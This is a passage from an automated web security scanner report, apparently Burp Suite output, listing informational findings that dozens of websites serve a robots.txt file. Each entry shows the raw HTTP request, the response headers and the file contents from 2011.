ETag: "680f5-55-1ae9b5c0"
Accept-Ranges: bytes
Content-Length: 85
Vary: Accept-Encoding,User-Agent
X-Bender: Behold... the Internet.
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /email_friend.php
Disallow: /print.php
Disallow: /search.php

27.1655. http://www.tubekong.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tubekong.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tubekong.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:45 GMT
Server: Apache/1.3.34 (Debian) mod_gzip/1.3.26.1a PHP/5.2.0-8+etch15 mod_ssl/2.8.25 OpenSSL/0.9.8c
Last-Modified: Fri, 12 Jun 2009 16:23:24 GMT
ETag: "1040120-18-4a3280fc"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow:

27.1656. http://www.tucsonweekly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucsonweekly.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tucsonweekly.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:25:19 GMT
Server: Apache
Last-Modified: Tue, 21 Jul 2009 19:36:27 GMT
ETag: "3fd-4a6618bb"
Accept-Ranges: bytes
Content-Length: 1021
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /gbase/ArticleArchives
Disallow: /gbase/CityWeek/ViewSearch
Disallow: /gbase/EventSearch
Disallow: /gbase/FilmSearch
Disallow: /gbase/LocationSearch
Disallow: /gbase/MovieTime
...[SNIP]...

27.1657. http://www.tulsalibrary.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tulsalibrary.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tulsalibrary.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 27 May 2008 13:59:59 GMT
Accept-Ranges: bytes
ETag: "121874f31c0c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:44:08 GMT
Connection: close
Content-Length: 132

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

27.1658. http://www.turboprofitsniper.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turboprofitsniper.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.turboprofitsniper.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:20:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Tue, 05 Oct 2010 00:22:57 GMT
ETag: "120c88f-3c-491d3a9a2fa40"
Accept-Ranges: bytes
Content-Length: 60
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

User-agent: Adsbot-Google
Allow: /


27.1659. http://www.turfshowtimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turfshowtimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.turfshowtimes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:58 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:40 GMT
ETag: "5601ba-d0-49e83f7b0eac5"
Accept-Ranges: bytes
Content-Length: 208
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...

27.1660. http://www.tv2.no/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tv2.no
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tv2.no

Response

HTTP/1.1 200 OK
ETag: "1c85b0-3d9-494a019f4e280"
Content-Type: text/plain; charset=UTF-8
Last-Modified: Tue, 09 Nov 2010 15:07:38 GMT
Keep-Alive: timeout=5, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.2.0 (H;max-age=1200+86400;age=158;ecid=216173065618473757,0)
Accept-Ranges: bytes
Connection: close
Date: Wed, 04 May 2011 00:43:58 GMT
Age: 0
Content-Length: 985

User-agent: *
Disallow: /dyn-nettavisen/
Disallow: /dyn-TV2/
Disallow: /TV2/arkiv/
Disallow: /TV2/css/
Disallow: /TV2/do/
Disallow: /TV2/esiincludes/
Disallow: /TV2/export/
Disallow: /TV2/feeds/
Disal
...[SNIP]...

27.1661. http://www.tvb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tvb.com

Response

HTTP/1.0 200 OK
Server: Apache/2
Last-Modified: Tue, 29 Sep 2009 07:26:24 GMT
ETag: "a0400a-51-474b254e2e800"-gzip
Content-Type: text/plain
Expires: Wed, 04 May 2011 03:22:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 03:22:51 GMT
Content-Length: 81
Connection: close

User-agent: *
Disallow: /search.*
Disallow: /search.php
Disallow: /search.html

27.1662. http://www.tvchannelsfree.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tvchannelsfree.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tvchannelsfree.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 02:59:18 GMT
ETag: "30f055-1f-47782cbf30d80"
Accept-Ranges: bytes
Content-Length: 31
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin

27.1663. http://www.twinkboylove.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.twinkboylove.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.twinkboylove.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:33 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
Last-Modified: Wed, 05 Aug 2009 08:05:15 GMT
ETag: "86e093-c6-4a793d3b"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /xmlrpc.php
Disallow: /wp-login.php
Disallow: /wp-register.php
Disallow: /go/
Disallow: /wp-admin/
Disallow: /wp-includes/
Sitemap: http://twinkboylove.com/sitemap.xml

27.1664. http://www.twtpoll.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.twtpoll.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.twtpoll.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:57:59 GMT
Server: Apache
Served-By: Joyent
Last-Modified: Wed, 23 Dec 2009 12:01:47 GMT
ETag: "b4800-6d-47b64164de624"
Accept-Ranges: bytes
Content-Length: 109
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /api/
Disallow: /css/
Disallow: /js/
Allow: /
Disallow: /php/
Disallow: /cache/

27.1665. http://www.ualmileageplus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ualmileageplus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ualmileageplus.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:34:19 GMT
Server: Microsoft-IIS/6.0
Content-type: text/plain
Last-modified: Mon, 03 May 2010 12:31:34 GMT
Content-length: 44
Accept-ranges: bytes

# all allowed
User-agent: *
Disallow:


27.1666. http://www.ucables.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ucables.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ucables.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 02:21:38 GMT
Content-Type: text/plain
Content-Length: 113
Last-Modified: Sat, 02 May 2009 22:49:13 GMT
Connection: close
Accept-Ranges: bytes

User-agent: Slurp
Crawl-delay: 10
User-agent: Googlebot
Disallow: /account/delivery.php
Disallow: /print-*.html

27.1667. http://www.ufodigest.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ufodigest.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ufodigest.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:15:00 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 16:48:47 GMT
ETag: "201d6-714-4a1fd54b839c0"
Accept-Ranges: bytes
Content-Length: 1812
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

27.1668. http://www.uillinois.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uillinois.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uillinois.edu

Response

HTTP/1.1 200 OK
Content-Length: 880
Content-Type: text/plain
Content-Location: http://www.uillinois.edu/robots.txt
Last-Modified: Tue, 17 Mar 2009 16:18:43 GMT
Accept-Ranges: bytes
ETag: "da2465a1ca7c91:5b25"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:59:45 GMT
Connection: close

# robots.txt for http://www.uillinois.edu/

User-agent: *

Disallow: /_content-archive/ # Nate putting old (maybe obsolete) uillinois stuff here

Disallow: /trustees/agenda/September%209,%202
...[SNIP]...

27.1669. http://www.uimn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uimn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uimn.com

Response

HTTP/1.1 200 OK
Set-Cookie:WEBTRENDS_ID=173.193.214.243-887631040.30149135; expires=Thu, 03-May-2012 03:56:11 GMT; path=/
Connection: close
Date: Wed, 04 May 2011 03:56:11 GMT
Content-Length: 293
Content-Type: text/plain
Last-Modified: Wed, 06 Jan 2010 20:27:03 GMT
Accept-Ranges: bytes
ETag: "322fc69be8fca1:256"
Server: WWW Server/1.1
X-Powered-By: ASP.NET

# robots.txt file for www.uimn.org
# e-mail to ui.mn@state.mn.us
User-agent: *
Disallow: /access
Disallow: /admin
Disallow: /aspnet_client
Disallow: /images
Disallow: /sec
Disallow: /search
D
...[SNIP]...

27.1670. http://www.uk420.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uk420.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uk420.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:48:56 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Wed, 09 Apr 2008 00:21:38 GMT
ETag: "2180194-416-44a65af2da880"
Accept-Ranges: bytes
Content-Length: 1046
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Disallow: /cgi-bin/
Disallow: /style_images/
Disallow: /index.php?act=Search
Disallow: /index.php?act=Login
Disallow: /index.php?act=Reg
Disallow: /index.php?act=calend
...[SNIP]...

27.1671. http://www.ukuleleunderground.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ukuleleunderground.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ukuleleunderground.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:17:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://ukuleleunderground.com/xmlrpc.php
Set-Cookie: PHPSESSID=65dba0cdf359b12f150bd59658c36d39; path=/
Set-Cookie: bp-message=deleted; expires=Tue, 04-May-2010 04:17:08 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Tue, 04-May-2010 04:17:08 GMT; path=/
Last-Modified: Wed, 04 May 2011 04:17:09 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1672. http://www.ul.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ul.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ul.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:43:36 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 29 Dec 2010 18:55:27 GMT
ETag: "80e5d8-35a-498911cc205c0"
Accept-Ranges: bytes
Content-Length: 858
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-Delay: 5
Disallow: /afci/
Disallow: /ccd/
Disallow: /cf_files/
Disallow: /CFIDE/
Disallow: /councils/
Disallow: /forms/
Disallow: /kids/
Disallow: /ulpix/
Disallow: /ttc/
Disallow:
...[SNIP]...

27.1673. http://www.ulm.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ulm.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ulm.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.2.13
Last-Modified: Tue, 22 Mar 2011 19:17:39 GMT
ETag: "927da-24-49f1718fadac0"
Accept-Ranges: bytes
Content-Length: 36
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /calendar/


27.1674. http://www.ultimate-penis-enlargement-guide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ultimate-penis-enlargement-guide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ultimate-penis-enlargement-guide.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:47:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Fri, 11 Dec 2009 19:31:09 GMT
ETag: "9a18ca2-60-47a78f735b940"
Accept-Ranges: bytes
Content-Length: 96
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /poll/
Sitemap: http://ultimate-penis-enlargement-guide.com/sitemap.xml

27.1675. http://www.umb.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.umb.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.umb.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:30:20 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 04 Mar 2011 15:35:54 GMT
ETag: "4d0009-308-e6cbea80"
Accept-Ranges: bytes
Content-Length: 776
Connection: close
Content-Type: text/plain


User-Agent:*
Disallow: /admissions2/
Disallow: /news/2008news/
Disallow: /news/2007news/
Disallow: /news/2006news/
Disallow: /news/2005news/
Disallow: /news/2004news/
Disallow: /news/2003news
...[SNIP]...

27.1676. http://www.unb.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unb.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.unb.ca

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:48:40 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.9 mod_ssl/2.2.14 OpenSSL/0.9.8m mod_perl/2.0.3 Perl/v5.8.7
Last-Modified: Thu, 21 Apr 2011 10:52:47 GMT
ETag: "75fe-104-4a16b8aba11ea"
Accept-Ranges: bytes
Content-Length: 260
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_resources/
Disallow: /xml/
Disallow: /aboutunb/img/
Disallow: /academics/img/
Disallow: /admissions/img/
Disallow: /futurestudents/img/
Disallow: /myunb/img/
Disallow
...[SNIP]...

27.1677. http://www.uncannymind.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uncannymind.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uncannymind.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:56:26 GMT
Server: Apache
Last-Modified: Sat, 10 Jul 2010 05:41:50 GMT
Accept-Ranges: bytes
Content-Length: 832
Connection: close
Content-Type: text/plain

# robots.txt for http://www.uncannymind.com/
User-agent: *
Disallow: /cgi-bin/
Disallow: /tmp/
Disallow: /private/
Disallow: /affadmin/
Disallow: /affiliates/
Disallow: /cgi/
Disallow: /images/
Disall
...[SNIP]...

27.1678. http://www.uneasysilence.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uneasysilence.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uneasysilence.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Vary: Cookie
Content-Type: text/plain; charset=utf-8
Date: Wed, 04 May 2011 02:06:32 GMT
X-Pingback: http://uneasysilence.com/xmlrpc.php
Connection: close
Set-Cookie: X-Mapping-neajoeoc=6F6132A85C0EEFD136F750367AB338BD; path=/

User-agent: *
Disallow:

27.1679. http://www.uniqlo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uniqlo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uniqlo.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html
Date: Wed, 04 May 2011 03:38:30 GMT
Content-Length: 45
Connection: close

User-Agent: *
Disallow: /award/dryinmotion/


27.1680. http://www.uniquedaily.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uniquedaily.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uniquedaily.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:24:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://uniquedaily.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1681. http://www.universalclass.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.universalclass.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.universalclass.com

Response

HTTP/1.1 200 OK
Content-Length: 424
Content-Type: text/plain
Last-Modified: Sat, 12 Dec 2009 14:06:41 GMT
Accept-Ranges: bytes
ETag: "6c65f553347bca1:5d9"
Server: Microsoft-IIS/6.0
UCW20: 3.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:18:48 GMT
Connection: close

# robots.txt

User-agent: *
Disallow: /graphics_gogoed/js/nav/
Disallow: /graphics_uc/js/nav/
Disallow: /i/js/nav/
Disallow: /i/c/
Disallow: /i/faculty/
Disallow: /faculty/
Disallow: /disclai
...[SNIP]...

27.1682. http://www.uniwatchblog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uniwatchblog.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uniwatchblog.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=utf-8
Date: Wed, 04 May 2011 02:17:38 GMT
X-Pingback: http://www.uniwatchblog.com/xmlrpc.php
Connection: close
Set-Cookie: X-Mapping-fhjpihoe=E4D03B1FA40481B53EC9FEE496ACD6A5; path=/
Content-Length: 77

User-agent: *
Disallow:

Sitemap: http://www.uniwatchblog.com/sitemap.xml.gz

27.1683. http://www.unsubmyemail.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unsubmyemail.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.unsubmyemail.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:56:50 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-3ubuntu4.5
Last-Modified: Thu, 06 May 2010 00:07:31 GMT
Etag: 9152d7f1724ed8fbcd2e0c87029f193c
Vary: Accept-Encoding
Content-Length: 25
Connection: close
Content-Type: text/plain;charset=utf-8

User-agent: *
Disallow: /

27.1684. http://www.unsw.edu.au/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unsw.edu.au
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.unsw.edu.au

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:56:55 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8h
Last-Modified: Wed, 02 Mar 2011 04:07:37 GMT
ETag: "31ccd-a63-49d780d9ef440"
Accept-Ranges: bytes
Content-Length: 2659
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /includes/secure/afterhours/
Disallow: /includes/experts/experts.html
Disallow: /includes/experts/buttonBack.cfg
Disallow: /includes/experts/buttonForw
...[SNIP]...

27.1685. http://www.upcdatabase.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.upcdatabase.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.upcdatabase.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:38:49 GMT
Server: Apache
Last-Modified: Thu, 28 Oct 2010 16:42:31 GMT
ETag: "a00da-116-493b007388a34"
Accept-Ranges: bytes
Content-Length: 278
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: user
# Disallow: item
Disallow: pager.asp
Disallow: editform.asp
Disallow: deleteform.asp
# Disallow: itemnotfound.asp
Disallow: /user
# Disallow: /item
Disallow: /pager.asp
Di
...[SNIP]...

27.1686. http://www.uptracs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.uptracs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.uptracs.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:33 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6 mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 29 Oct 2008 21:14:47 GMT
ETag: "1e582a2-1a-45a6ada93dfc0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.1687. http://www.urltv.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.urltv.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.urltv.tv

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:10:53 GMT
Server: Apache
X-Pingback: http://www.urltv.tv/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1688. http://www.usafootball.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usafootball.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usafootball.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:39 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 08 Feb 2011 16:47:06 GMT
ETag: "29610-636-49bc8193c7680"
Accept-Ranges: bytes
Content-Length: 1590
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1689. http://www.usagencies.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usagencies.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usagencies.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 01 Sep 2010 18:58:46 GMT
Accept-Ranges: bytes
ETag: "67ff83b474acb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:50:46 GMT
Connection: close
Content-Length: 258

# robots.txt for http://www.usagencies.com/

User-agent: *
Disallow: /Agent/
Disallow: /AgentTest/
Disallow: /AgentListener/
Disallow: /AgentListenerTest/
Disallow: /CCCListener/
Disallow: /CC
...[SNIP]...

27.1690. http://www.usairwayscruises.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usairwayscruises.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usairwayscruises.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1342
Content-Type: text/plain
Last-Modified: Fri, 14 Jan 2011 17:16:42 GMT
Accept-Ranges: bytes
ETag: "d6859d0eb4cb1:622e"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:22:00 GMT
Connection: keep-alive
Set-Cookie: NSC_WJQ-XXX.VTBJSXBZTDSVJTFT.DPN=ffffffff095b1c2c45525d5f4f58455e445a4a423662;path=/

# $Header: /WebSites/affiliate/robots.txt 5 9/24/10 10:40a Toleary $
# robot exclusion list
User-agent: *
Disallow: /promotion/cruise411/cashback2/default.asp
Disallow: /promotion/CruisesOnly/
...[SNIP]...

27.1691. http://www.usamilitarymedals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usamilitarymedals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usamilitarymedals.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:23:08 GMT
Server: Apache
Last-Modified: Tue, 10 Aug 2010 07:27:20 GMT
Accept-Ranges: bytes
Content-Length: 726
Cache-Control: max-age=315360000
Expires: Sat, 01 May 2021 03:23:08 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Disallow: /product_reviews_write.php
Disallow: /tell_a_friend.php
Disallow: /create_account.php
Disallow: /login.php
Disallow: /myrack.php
Disallow: /rack_shopping_cart
...[SNIP]...

27.1692. http://www.usapaydayassistance.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usapaydayassistance.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usapaydayassistance.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:26:52 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Last-Modified: Fri, 14 Jan 2011 20:07:31 GMT
ETag: "2591f25-e7-4d30ad03"
